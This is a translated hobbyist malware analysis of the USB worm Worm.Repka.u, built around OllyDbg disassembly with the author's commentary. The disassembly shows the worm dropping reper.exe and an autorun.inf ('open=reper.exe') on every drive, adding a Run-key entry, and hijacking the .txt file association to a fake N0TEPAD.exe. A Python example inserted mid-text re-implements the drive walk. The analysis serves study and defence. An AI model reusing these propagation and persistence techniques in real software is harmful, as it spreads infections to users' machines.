Virus name: Worm.Repka.u
Tools used: OD (OllyDbg), Shadow System (影子系统)
Article version: 2.0
QQ: 464252600
Author: NONAME剑人
Group: [CPU]
Age: the youngest of the CRACKERs :)
---------------------------
I'm writing this 2.0 because a certain guru said my 1.0 analysis was far too shallow, so it looks like I have to redo the analysis :)
PS: 1.0 was shallow because I hadn't installed Shadow System yet and didn't dare to debug dynamically. Maybe that's the difference between an expert and a newbie (I'm the newbie, you're the expert...) :P
OK, enough chatter, on with the analysis :)
My write-up is mostly in the comments, so read the disassembly carefully...
First set a breakpoint: bpx CreateFileA (sorry, I remember that's the breakpoint I set)
00401850 /> \55 PUSH EBP ;//this routine is where the virus starts its infection process...
00401851 |. 8BEC MOV EBP,ESP
00401853 |. 81EC 70010000 SUB ESP,170
00401859 |. 53 PUSH EBX
0040185A |. 56 PUSH ESI
0040185B |. 57 PUSH EDI
0040185C |. 8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
00401862 |. B9 5C000000 MOV ECX,5C
00401867 |. B8 CCCCCCCC MOV EAX,CCCCCCCC
0040186C |. F3:AB REP STOS DWORD PTR ES:[EDI]
0040186E |. 8BF4 MOV ESI,ESP
00401870 |. 68 00ED4200 PUSH reper.0042ED00 ; /pThreadId = reper.0042ED00
00401875 |. 6A 00 PUSH 0 ; |CreationFlags = 0
00401877 |. 6A 00 PUSH 0 ; |pThreadParm = NULL
00401879 |. 68 2D104000 PUSH reper.0040102D ; |ThreadFunction = reper.0040102D
0040187E |. 6A 00 PUSH 0 ; |StackSize = 0
00401880 |. 6A 00 PUSH 0 ; |pSecurity = NULL
00401882 |. FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
00401888 |. 3BF4 CMP ESI,ESP
0040188A |. E8 514F0000 CALL reper.004067E0
0040188F |. A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX
00401894 |. C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4
0040189B |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63
0040189F |. 833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0
004018A6 |. 0F85 21020000 JNZ reper.00401ACD
004018AC |. 8BF4 MOV ESI,ESP
004018AE |. FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives
004018B4 |. 3BF4 CMP ESI,ESP
004018B6 |. E8 254F0000 CALL reper.004067E0
004018BB |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
004018C1 |. C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0
004018CB |. EB 0F JMP SHORT reper.004018DC
004018CD |> 8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110] ; load the value stored at [EBP-110] into EAX
004018D3 |. 83C0 01 |ADD EAX,1 ; ASCII code +1, walking through the drive letters
004018D6 |. 8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX ; store the incremented value back
004018DC |> 83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20 ; if the ASCII count goes above 20 (there are only 26 drives in total... so C: through Z: seems the sensible range...)
004018E3 |. 0F8D 05010000 |JGE reper.004019EE ; then jump, otherwise stay put!
004018E9 |. 8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C]
004018EF |. 234D FC |AND ECX,DWORD PTR SS:[EBP-4]
004018F2 |. 85C9 |TEST ECX,ECX ; 看看这个盘符行不行
004018F4 |. 0F84 DE000000 |JE reper.004019D8
004018FA |. 68 DCA04200 |PUSH reper.0042A0DC ; /ASCII ":\reper.exe" //why prepend ":\"? Because after walking the drives the virus can directly do "c"+":\reper.exe"....
004018FF |. 0FBE55 F8 |MOVSX EDX,BYTE PTR SS:[EBP-8] ; |
00401903 |. 52 |PUSH EDX ; |Arg3
00401904 |. 68 74A14200 |PUSH reper.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s"
00401909 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] ; |
0040190F |. 50 |PUSH EAX ; |Arg1
00401910 |. E8 EB4C0000 |CALL reper.00406600 ; \reper.00406600
00401915 |. 83C4 10 |ADD ESP,10
00401918 |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
0040191E |. 51 |PUSH ECX ; now it joins the earlier [EBP-110] with ":\reper.exe"
0040191F |. E8 04F7FFFF |CALL reper.00401028
00401924 |. 83C4 04 |ADD ESP,4
00401927 |. 3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10]
0040192D |. 74 1E |JE SHORT reper.0040194D
0040192F |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401935 |. 52 |PUSH EDX
00401936 |. E8 D9F6FFFF |CALL reper.00401014
0040193B |. 83C4 04 |ADD ESP,4
0040193E |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
00401944 |. 50 |PUSH EAX ; /Arg1
00401945 |. E8 C64F0000 |CALL reper.00406910 ; \reper.00406910
0040194A |. 83C4 04 |ADD ESP,4
0040194D |> 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
00401953 |. 51 |PUSH ECX
00401954 |. E8 B1F6FFFF |CALL reper.0040100A
00401959 |. 83C4 04 |ADD ESP,4
0040195C |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401962 |. 52 |PUSH EDX
00401963 |. E8 A7F6FFFF |CALL reper.0040100F
00401968 |. 83C4 04 |ADD ESP,4
0040196B |. 68 6CA04200 |PUSH reper.0042A06C ; /Arg4 = 0042A06C ASCII ":\autorun.inf"
00401970 |. 0FBE45 F8 |MOVSX EAX,BYTE PTR SS:[EBP-8] ; //same idea as above... only now it becomes AUTORUN.INF
00401974 |. 50 |PUSH EAX ; |Arg3
00401975 |. 68 74A14200 |PUSH reper.0042A174 ; |Arg2 = 0042A174 ASCII "%c%s" //could an expert explain this parameter
0040197A |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108] ; |
00401980 |. 51 |PUSH ECX ; |Arg1
00401981 |. E8 7A4C0000 |CALL reper.00406600 ; \reper.00406600
00401986 |. 83C4 10 |ADD ESP,10
00401989 |. 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
0040198F |. 52 |PUSH EDX
00401990 |. E8 A2F6FFFF |CALL reper.00401037
00401995 |. 83C4 04 |ADD ESP,4
00401998 |. 85C0 |TEST EAX,EAX
0040199A |. 75 1E |JNZ SHORT reper.004019BA
0040199C |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019A2 |. 50 |PUSH EAX
004019A3 |. E8 6CF6FFFF |CALL reper.00401014
004019A8 |. 83C4 04 |ADD ESP,4
004019AB |. 8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
004019B1 |. 51 |PUSH ECX ; /Arg1
004019B2 |. E8 594F0000 |CALL reper.00406910 ; \reper.00406910
004019B7 |. 83C4 04 |ADD ESP,4
004019BA |> 8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
004019C0 |. 52 |PUSH EDX
004019C1 |. E8 3FF6FFFF |CALL reper.00401005
004019C6 |. 83C4 04 |ADD ESP,4
004019C9 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019CF |. 50 |PUSH EAX
004019D0 |. E8 3AF6FFFF |CALL reper.0040100F
004019D5 |. 83C4 04 |ADD ESP,4
004019D8 |> 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4]
004019DB |. D1E1 |SHL ECX,1
004019DD |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX
004019E0 |. 8A55 F8 |MOV DL,BYTE PTR SS:[EBP-8]
004019E3 |. 80C2 01 |ADD DL,1
004019E6 |. 8855 F8 |MOV BYTE PTR SS:[EBP-8],DL
004019E9 |.^ E9 DFFEFFFF \JMP reper.004018CD
004019EE |> 68 44A14200 PUSH reper.0042A144 ; /ASCII "viewer.exe" //now it also drops itself under C:\WINDOWS; comrades on Windows 2000 are lucky :)
004019F3 |. 68 F8EB4200 PUSH reper.0042EBF8 ; |Arg3 = 0042EBF8 ASCII "C:\windows\"
004019F8 |. 68 30A04200 PUSH reper.0042A030 ; |Arg2 = 0042A030 ASCII "%s%s"
004019FD |. 68 F8EA4200 PUSH reper.0042EAF8 ; |Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe"
00401A02 |. E8 F94B0000 CALL reper.00406600 ; \reper.00406600
00401A07 |. 83C4 10 ADD ESP,10
00401A0A |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe"
00401A0F |. E8 14F6FFFF CALL reper.00401028
00401A14 |. 83C4 04 ADD ESP,4
00401A17 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A1D |. 74 1A JE SHORT reper.00401A39 ; jump if the file already exists
00401A1F |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe"
00401A24 |. E8 EBF5FFFF CALL reper.00401014
00401A29 |. 83C4 04 ADD ESP,4
00401A2C |. 68 F8EA4200 PUSH reper.0042EAF8 ; /Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe"
00401A31 |. E8 DA4E0000 CALL reper.00406910 ; \reper.00406910
00401A36 |. 83C4 04 ADD ESP,4
00401A39 |> 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe"
00401A3E |. E8 C7F5FFFF CALL reper.0040100A
00401A43 |. 83C4 04 ADD ESP,4
00401A46 |. 68 F8EA4200 PUSH reper.0042EAF8 ; ASCII "C:\windows\viewer.exe" no idea why it overwrites it?
00401A4B |. E8 C4F5FFFF CALL reper.00401014
00401A50 |. 83C4 04 ADD ESP,4
00401A53 |. 68 F8EB4200 PUSH reper.0042EBF8 ; /Arg3 = 0042EBF8 ASCII "C:\windows\"
00401A58 |. 68 2CA14200 PUSH reper.0042A12C ; |Arg2 = 0042A12C ASCII "%ssystem32\N0TEPAD.exe" //look closely: it's %s plus system32
00401A5D |. 68 F8E94200 PUSH reper.0042E9F8 ; |drops N0TEPAD (that's N-zero-TEPAD...)
00401A62 |. E8 994B0000 CALL reper.00406600 ; \reper.00406600
00401A67 |. 83C4 0C ADD ESP,0C
00401A6A |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
//initialization for changing the file association (i.e. pushing onto the stack. It is the stack, right? Experts, forgive me...)
00401A6F |. E8 B4F5FFFF CALL reper.00401028
00401A74 |. 83C4 04 ADD ESP,4
00401A77 |. 3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A7D |. 74 1A JE SHORT reper.00401A99
00401A7F |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A84 |. E8 8BF5FFFF CALL reper.00401014
00401A89 |. 83C4 04 ADD ESP,4
00401A8C |. 68 F8E94200 PUSH reper.0042E9F8 ; /Arg1 = 0042E9F8 ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A91 |. E8 7A4E0000 CALL reper.00406910 ; \reper.00406910
00401A96 |. 83C4 04 ADD ESP,4
00401A99 |> 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A9E |. E8 67F5FFFF CALL reper.0040100A
00401AA3 |. 83C4 04 ADD ESP,4
00401AA6 |. 68 F8E94200 PUSH reper.0042E9F8 ; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401AAB |. E8 64F5FFFF CALL reper.00401014
00401AB0 |. 83C4 04 ADD ESP,4
00401AB3 |. 68 50B34200 PUSH reper.0042B350
00401AB8 |. E8 4DF5FFFF CALL reper.0040100A
00401ABD |. 83C4 04 ADD ESP,4
00401AC0 |. 68 50B34200 PUSH reper.0042B350
00401AC5 |. E8 4AF5FFFF CALL reper.00401014
00401ACA |. 83C4 04 ADD ESP,4
00401ACD |> A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401AD2 |. 83C0 01 ADD EAX,1
00401AD5 |. A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX
00401ADA |. A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401ADF |. 99 CDQ
00401AE0 |. B9 05000000 MOV ECX,5
00401AE5 |. F7F9 IDIV ECX
00401AE7 |. 8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX
00401AED |. C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],reper.0042EAF>; ASCII "C:\windows\viewer.exe"
00401AF7 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B2E>; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00401B01 |. 8BF4 MOV ESI,ESP ; the lines above show the virus is about to add entries to the registry
00401B03 |. 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118]
00401B09 |. 52 PUSH EDX ; /pHandle
00401B0A |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE
00401B0F |. 6A 00 PUSH 0 ; |Reserved = 0
00401B11 |. 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] ; |
00401B17 |. 50 PUSH EAX ; |Subkey
00401B18 |. 68 02000080 PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401B1D |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA -- what it adds = PUSH 80000002 (HKEY_LOCAL_MACHINE) + EAX (Software\Microsoft\Windows\CurrentVersion\Run), with write access
00401B23 |. 3BF4 CMP ESI,ESP
00401B25 |. E8 B64C0000 CALL reper.004067E0
00401B2A |. 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX
00401B30 |. 8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114]
00401B36 |. 51 PUSH ECX
00401B37 |. E8 C44B0000 CALL reper.00406700
00401B3C |. 83C4 04 ADD ESP,4
00401B3F |. 8BF4 MOV ESI,ESP ; the next few steps actually load the virus into the registry: above it opened the key, below it modifies and writes
00401B41 |. 50 PUSH EAX ; /BufSize
00401B42 |. 8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114] ; |
00401B48 |. 52 PUSH EDX ; |Buffer
00401B49 |. 6A 01 PUSH 1 ; |ValueType = REG_SZ
00401B4B |. 6A 00 PUSH 0 ; |Reserved = 0
00401B4D |. 68 ACA04200 PUSH reper.0042A0AC ; |ValueName = "runreper" sorry, the registry doesn't interest me much; I think it's a value named runreper with data c:\windows\viewer.exe
00401B52 |. 8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118] ; |
00401B58 |. 50 PUSH EAX ; |hKey
00401B59 |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401B5F |. 3BF4 CMP ESI,ESP
00401B61 |. E8 7A4C0000 CALL reper.004067E0
00401B66 |. 8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX
00401B6C |. 8BF4 MOV ESI,ESP
00401B6E |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]
00401B74 |. 51 PUSH ECX ; /hKey
00401B75 |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401B7B |. 3BF4 CMP ESI,ESP
00401B7D |. E8 5E4C0000 CALL reper.004067E0 ; the virus plays dirty! Confirmed with UE: it is N-zero-TEPAD, this is changing the file association!
00401B82 |. C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B33>; ASCII "txtfile\shell\open\command"
00401B8C |. C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],reper.0042E9F>; ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401B96 |. 68 68A04200 PUSH reper.0042A068 ; ASCII " %1"
00401B9B |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BA1 |. 52 PUSH EDX
00401BA2 |. E8 894C0000 CALL reper.00406830
00401BA7 |. 83C4 08 ADD ESP,8
00401BAA |. 8BF4 MOV ESI,ESP
00401BAC |. 8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118] ; changes the association under HKEY_CLASSES_ROOT\txtfile\shell\open\command!
00401BB2 |. 50 PUSH EAX ; /pHandle
00401BB3 |. 68 06000200 PUSH 20006 ; |Access = KEY_WRITE //writing to the registry
00401BB8 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BBA |. 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] ; |
00401BC0 |. 51 PUSH ECX ; |Subkey
00401BC1 |. 68 00000080 PUSH 80000000 ; |hKey = HKEY_CLASSES_ROOT
00401BC6 |. FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA //opens the registry key
00401BCC |. 3BF4 CMP ESI,ESP
00401BCE |. E8 0D4C0000 CALL reper.004067E0
00401BD3 |. 8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX
00401BD9 |. 8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BDF |. 52 PUSH EDX
00401BE0 |. E8 1B4B0000 CALL reper.00406700
00401BE5 |. 83C4 04 ADD ESP,4
00401BE8 |. 8BF4 MOV ESI,ESP
00401BEA |. 50 PUSH EAX ; /BufSize
00401BEB |. 8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128] ; |
00401BF1 |. 50 PUSH EAX ; |Buffer
00401BF2 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00401BF4 |. 6A 00 PUSH 0 ; |Reserved = 0
00401BF6 |. 6A 00 PUSH 0 ; |ValueName = NULL
00401BF8 |. 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] ; |
00401BFE |. 51 PUSH ECX ; |hKey
00401BFF |. FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401C05 |. 3BF4 CMP ESI,ESP
00401C07 |. E8 D44B0000 CALL reper.004067E0
00401C0C |. 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX
00401C12 |. 8BF4 MOV ESI,ESP
00401C14 |. 8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118]
00401C1A |. 52 PUSH EDX ; /hKey
00401C1B |. FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C21 |. 3BF4 CMP ESI,ESP
00401C23 |. E8 B84B0000 CALL reper.004067E0
00401C28 |. 5F POP EDI
00401C29 |. 5E POP ESI
00401C2A |. 5B POP EBX
00401C2B |. 81C4 70010000 ADD ESP,170
00401C31 |. 3BEC CMP EBP,ESP
00401C33 |. E8 A84B0000 CALL reper.004067E0
00401C38 |. 8BE5 MOV ESP,EBP
00401C3A |. 5D POP EBP
00401C3B \. C2 1000 RETN 10
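The drive walk at 004018CD..004019E9 above, rewritten in Python as an added example (this is not code from the original post, and it only reproduces the arithmetic in the listing; it writes nothing): the mask in [EBP-4] starts at 4, which is bit 2 of the GetLogicalDrives() result, i.e. drive C:, and the letter in [EBP-8] starts at 'c'; each of the 0x20 passes tests one bit, then doubles the mask and increments the letter. Running it shows two things the listing does not state outright: A: and B: are never visited, and the passes after 'z' are harmless because GetLogicalDrives never sets bits above 25. The function names and the constructed drive mask are my own; the result is the list of paths a triage script would look for.

```python
# Added example (not from the original post): a Python re-implementation of the
# drive walk in reper.00401850 (004018C1..004019E9). It reproduces the loop's
# arithmetic so the bounds in the listing can be checked; it writes nothing.
#
#   [EBP-4]   = 4       bit mask, starts at bit 2 of GetLogicalDrives() = drive C:
#   [EBP-8]   = 0x63    drive letter, starts at 'c'
#   [EBP-110] = 0..0x1F loop counter, loop exits when it reaches 0x20 (JGE)
# Each pass: if mask & drives -> sprintf("%c%s", letter, suffix) for both
# suffixes; then SHL mask,1 and ADD letter,1.
from typing import List, Tuple

REPER_SUFFIX = ":\\reper.exe"      # string at 0042A0DC in the listing
AUTORUN_SUFFIX = ":\\autorun.inf"  # string at 0042A06C in the listing


def logical_drives_mask(letters: str) -> int:
    """Build a GetLogicalDrives()-style bitmask (bit 0 = A:) from drive letters.

    Helper for constructing sample input; GetLogicalDrives itself is not called."""
    mask = 0
    for ch in letters.lower():
        mask |= 1 << (ord(ch) - ord("a"))
    return mask


def walk_drives_like_reper(drives_mask: int) -> List[Tuple[str, str]]:
    """Return the (reper.exe path, autorun.inf path) pairs the loop would build."""
    bit = 4        # MOV DWORD PTR SS:[EBP-4],4
    letter = 0x63  # MOV BYTE PTR SS:[EBP-8],63   ('c')
    targets = []
    for _ in range(0x20):              # CMP [EBP-110],20 / JGE -> exit
        if drives_mask & bit:          # AND ECX,[EBP-4] / TEST ECX,ECX / JE skip
            prefix = "%c" % letter     # sprintf("%c%s", ...) via reper.00406600
            targets.append((prefix + REPER_SUFFIX, prefix + AUTORUN_SUFFIX))
        bit = (bit << 1) & 0xFFFFFFFF  # SHL ECX,1 on a 32-bit register
        letter = (letter + 1) & 0xFF   # ADD DL,1 on an 8-bit register
    return targets


def unvisited_drives(drives_mask: int) -> str:
    """Drive letters present in the mask that the loop never reaches
    (A: and B:, because the mask starts at bit 2)."""
    visited = {pair[0][0] for pair in walk_drives_like_reper(drives_mask)}
    present = [chr(ord("a") + i) for i in range(26) if drives_mask & (1 << i)]
    return "".join(c for c in present if c not in visited).upper()


if __name__ == "__main__":
    # Constructed sample: floppy A:, hard disks C: and D:, USB stick E:.
    sample_mask = logical_drives_mask("ACDE")
    for reper_path, autorun_path in walk_drives_like_reper(sample_mask):
        print(reper_path, autorun_path)
    print("never visited:", unvisited_drives(sample_mask))
```

The 0x20 bound the author wonders about is simply the loop counter: 32 passes cover every bit of the 32-bit mask, and since the mask starts at bit 2 the last six passes compare against bits no drive can occupy.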
This is the trace of the AUTORUN drop mentioned above
00401D40 > \55 PUSH EBP
00401D41 . 8BEC MOV EBP,ESP
00401D43 . 6A FF PUSH -1
00401D45 . 68 C9894100 PUSH reper.004189C9 ; SE handler installation
00401D4A . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401D50 . 50 PUSH EAX
00401D51 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
00401D58 . 81EC A4000000 SUB ESP,0A4
00401D5E . 53 PUSH EBX
00401D5F . 56 PUSH ESI
00401D60 . 57 PUSH EDI
00401D61 . 8DBD 50FFFFFF LEA EDI,DWORD PTR SS:[EBP-B0]
00401D67 . B9 29000000 MOV ECX,29
00401D6C . B8 CCCCCCCC MOV EAX,CCCCCCCC
00401D71 . F3:AB REP STOS DWORD PTR ES:[EDI]
00401D73 . 6A 01 PUSH 1 ; /Arg1 = 00000001
00401D75 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00401D78 . E8 33080000 CALL reper.004025B0 ; \reper.004025B0
00401D7D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00401D84 . B9 06000000 MOV ECX,6
00401D89 . BE 7CA04200 MOV ESI,reper.0042A07C ; ASCII "[autorun]
open=reper.exe"
00401D8E . 8D7D 90 LEA EDI,DWORD PTR SS:[EBP-70]
00401D91 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401D93 . A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00401D94 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00401D99 . 50 PUSH EAX ; /Arg3 => 000001A4
00401D9A . 6A 02 PUSH 2 ; |Arg2 = 00000002
00401D9C . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
00401D9F . 51 PUSH ECX ; |Arg1
00401DA0 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00401DA3 . E8 180F0000 CALL reper.00402CC0 ; \reper.00402CC0
00401DA8 . 8D55 90 LEA EDX,DWORD PTR SS:[EBP-70]
00401DAB . 52 PUSH EDX ; /[autorun]open=reper.exe the virus landed here after the earlier jump into the drop routine
00401DAC . 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48] ; |
00401DAF . E8 0C120000 CALL reper.00402FC0 ; \reper.00402FC0
00401DB4 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00401DB7 . E8 840F0000 CALL reper.00402D40
00401DBC . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
00401DC3 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00401DC6 . E8 67F2FFFF CALL reper.00401032
00401DCB . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00401DCE . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00401DD5 . 5F POP EDI
00401DD6 . 5E POP ESI
00401DD7 . 5B POP EBX
00401DD8 . 81C4 B0000000 ADD ESP,0B0
00401DDE . 3BEC CMP EBP,ESP
00401DE0 . E8 FB490000 CALL reper.004067E0
00401DE5 . 8BE5 MOV ESP,EBP
00401DE7 . 5D POP EBP
00401DE8 . C3 RETN
Then it drops its own body
00401F15 . 68 E9894100 PUSH reper.004189E9 ; SE handler installation -- the virus starts dropping files...
00401F1A . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401F20 . 50 PUSH EAX
00401F21 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
00401F28 . 81EC 90000000 SUB ESP,90
00401F2E . 53 PUSH EBX
00401F2F . 56 PUSH ESI
00401F30 . 57 PUSH EDI
00401F31 . 8DBD 64FFFFFF LEA EDI,DWORD PTR SS:[EBP-9C]
00401F37 . B9 24000000 MOV ECX,24
00401F3C . B8 CCCCCCCC MOV EAX,CCCCCCCC
00401F41 . F3:AB REP STOS DWORD PTR ES:[EDI]
00401F43 . 6A 01 PUSH 1 ; /Arg1 = 00000001
00401F45 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00401F48 . E8 63060000 CALL reper.004025B0 ; \reper.004025B0
00401F4D . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00401F54 . A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00401F59 . 50 PUSH EAX ; /Arg3 => 000001A4
00401F5A . 68 80000000 PUSH 80 ; |Arg2 = 00000080
00401F5F . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
00401F62 . 51 PUSH ECX ; |Arg1
00401F63 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00401F66 . E8 550D0000 CALL reper.00402CC0 ; \reper.00402CC0
00401F6B . 6A 02 PUSH 2 ; /Arg2 = 00000002
00401F6D . 6A 00 PUSH 0 ; |Arg1 = 00000000
00401F6F . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54] ; |
00401F72 . E8 49290000 CALL reper.004048C0 ; \reper.004048C0
00401F77 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00401F7A . E8 D1290000 CALL reper.00404950
00401F7F . 8945 A8 MOV DWORD PTR SS:[EBP-58],EAX
00401F82 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00401F85 . E8 B60D0000 CALL reper.00402D40
00401F8A . 8B55 A8 MOV EDX,DWORD PTR SS:[EBP-58]
00401F8D . 8955 A4 MOV DWORD PTR SS:[EBP-5C],EDX
00401F90 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
00401F97 . 8D4D AC LEA ECX,DWORD PTR SS:[EBP-54]
00401F9A . E8 93F0FFFF CALL reper.00401032
00401F9F . 8B45 A4 MOV EAX,DWORD PTR SS:[EBP-5C]
00401FA2 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00401FA5 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00401FAC . 5F POP EDI
00401FAD . 5E POP ESI
00401FAE . 5B POP EBX
00401FAF . 81C4 9C000000 ADD ESP,9C
00401FB5 . 3BEC CMP EBP,ESP
00401FB7 . E8 24480000 CALL reper.004067E0
00401FBC . 8BE5 MOV ESP,EBP
00401FBE . 5D POP EBP
00401FBF . C3 RETN
Releasing the poison gas...
00406910 /$ 55 PUSH EBP
00406911 |. 8BEC MOV EBP,ESP
00406913 |. 51 PUSH ECX
00406914 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00406917 |. 50 PUSH EAX ; /FileName //checks whether there is an AUTORUN.INF file
00406918 |. FF15 50134300 CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA //CUTs someone else's AUTORUN
0040691E |. 85C0 TEST EAX,EAX
00406920 |. 75 0B JNZ SHORT reper.0040692D
00406922 |. FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
00406928 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
0040692B |. EB 07 JMP SHORT reper.00406934
0040692D |> C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00406934 |> 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
00406938 |. 74 11 JE SHORT reper.0040694B
0040693A |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
0040693D |. 51 PUSH ECX ; /Arg1
0040693E |. E8 7D420000 CALL reper.0040ABC0 ; \reper.0040ABC0
00406943 |. 83C4 04 ADD ESP,4
00406946 |. 83C8 FF OR EAX,FFFFFFFF
00406949 |. EB 02 JMP SHORT reper.0040694D
0040694B |> 33C0 XOR EAX,EAX
